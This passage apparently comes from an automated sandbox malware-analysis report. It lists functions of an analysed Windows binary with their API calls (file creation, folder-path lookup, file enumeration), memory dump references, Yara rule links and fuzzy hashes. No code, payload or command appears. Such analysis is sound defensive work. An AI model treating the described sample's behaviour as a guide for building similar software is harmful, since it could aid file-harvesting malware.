                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Value___vcrt_
                              • String ID:
                              • API String ID: 1426506684-0
                              • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                              • Instruction ID: f3f4accc326bf3d9c76e4c805668395c621e5322b811e762f10a35caf7ad2b1b
                              • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                              • Instruction Fuzzy Hash: D3017C3220DB26AEFE3436785CC9A6A2694FB017B5B38433AF216C91F3EF524C419341
                              Function 00827B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00830DE8,00000000,?), ref: 00827B40
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00827B47
                              • GetLocalTime.KERNEL32(?,?,?,?,?,00830DE8,00000000,?), ref: 00827B54
                              • wsprintfA.USER32 ref: 00827B83
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: 986f71541ceaa119d52221429355531e018e9f1c71f27265dac068411d63887d
                              • Instruction ID: a57de3016183ee87515a61c983ef519ca50a3cafbade8d74fe5b619528324332
                              • Opcode Fuzzy Hash: 986f71541ceaa119d52221429355531e018e9f1c71f27265dac068411d63887d
                              • Instruction Fuzzy Hash: 13112AB2908258ABCB14DBC9ED85BFEB7B8FB4CB11F10411AF605A6280E6395941C7B0
                              Function 00829470 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(00823D3E,80000000,00000003,00000000,00000003,00000080,00000000,?,00823D3E,?), ref: 0082948C
                              • GetFileSizeEx.KERNEL32(000000FF,00823D3E), ref: 008294A9
                              • CloseHandle.KERNEL32(000000FF), ref: 008294B7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID:
                              • API String ID: 1378416451-0
                              • Opcode ID: a1fcc94da0e216dde6c8d7a15393a975b952fcc9eb3ef87ddfc775b7361bfe56
                              • Instruction ID: 320da986fb6c9c9e1e80b80f3ae9e583ff9142acd0bf8589239840c50656911e
                              • Opcode Fuzzy Hash: a1fcc94da0e216dde6c8d7a15393a975b952fcc9eb3ef87ddfc775b7361bfe56
                              • Instruction Fuzzy Hash: 84F03135E04208BBDB10DBF4EC89F5E77B9FB48714F108694FA51EB190D67096429B54
                              Function 0082CA72 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • __getptd.LIBCMT ref: 0082CA7E
                                • Part of subcall function 0082C2A0: __amsg_exit.LIBCMT ref: 0082C2B0
                              • __getptd.LIBCMT ref: 0082CA95
                              • __amsg_exit.LIBCMT ref: 0082CAA3
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0082CAC7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 0d04895942f1ca1d26e7d683fb75ab7490540348370f5847687baa68ad24e51a
                              • Instruction ID: e54f6c6a6f0a40636c7567bf512fa5b8fb12758422c4cdcdf14848fc45ef71f0
                              • Opcode Fuzzy Hash: 0d04895942f1ca1d26e7d683fb75ab7490540348370f5847687baa68ad24e51a
                              • Instruction Fuzzy Hash: 81F067B2945738DBD620FBACB802B6E37A0FF40720F10014AE406E62D2CB2459C08BD7
                              Function 008904D3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Catch
                              • String ID: MOC$RCC
                              • API String ID: 78271584-2084237596
                              • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                              • Instruction ID: 307176bf32f96a7e6d971cd36ab9c66c72981da53c82b21267cdb1fb344f7e48
                              • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                              • Instruction Fuzzy Hash: 82414871900209EFDF16EF98DC81AAEBBB5FF48304F198199FA04B6251D3359A50DF51
                              Function 00825190 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00828F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00828F9B
                              • lstrcat.KERNEL32(?,00000000), ref: 008251CA
                              • lstrcat.KERNEL32(?,00831058), ref: 008251E7
                              • lstrcat.KERNEL32(?,015F8960), ref: 008251FB
                              • lstrcat.KERNEL32(?,0083105C), ref: 0082520D
                                • Part of subcall function 00824B60: wsprintfA.USER32 ref: 00824B7C
                                • Part of subcall function 00824B60: FindFirstFileA.KERNEL32(?,?), ref: 00824B93
                                • Part of subcall function 00824B60: StrCmpCA.SHLWAPI(?,00830FC4), ref: 00824BC1
                                • Part of subcall function 00824B60: StrCmpCA.SHLWAPI(?,00830FC8), ref: 00824BD7
                                • Part of subcall function 00824B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00824DCD
                                • Part of subcall function 00824B60: FindClose.KERNEL32(000000FF), ref: 00824DE2
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: 876d7195390d8a15be460ac6be0e6cfcaa76960ee7f1bedb17f7d9d4dec3f242
                              • Instruction ID: 161844926ba5c09a103d9dd8da00ec877a29f71a85419a7e9801381bbb145b8e
                              • Opcode Fuzzy Hash: 876d7195390d8a15be460ac6be0e6cfcaa76960ee7f1bedb17f7d9d4dec3f242
                              • Instruction Fuzzy Hash: 7721F8B6900218ABCB14EBF4FC96EED333CFB98300F404558B655D6191EE749AC98B92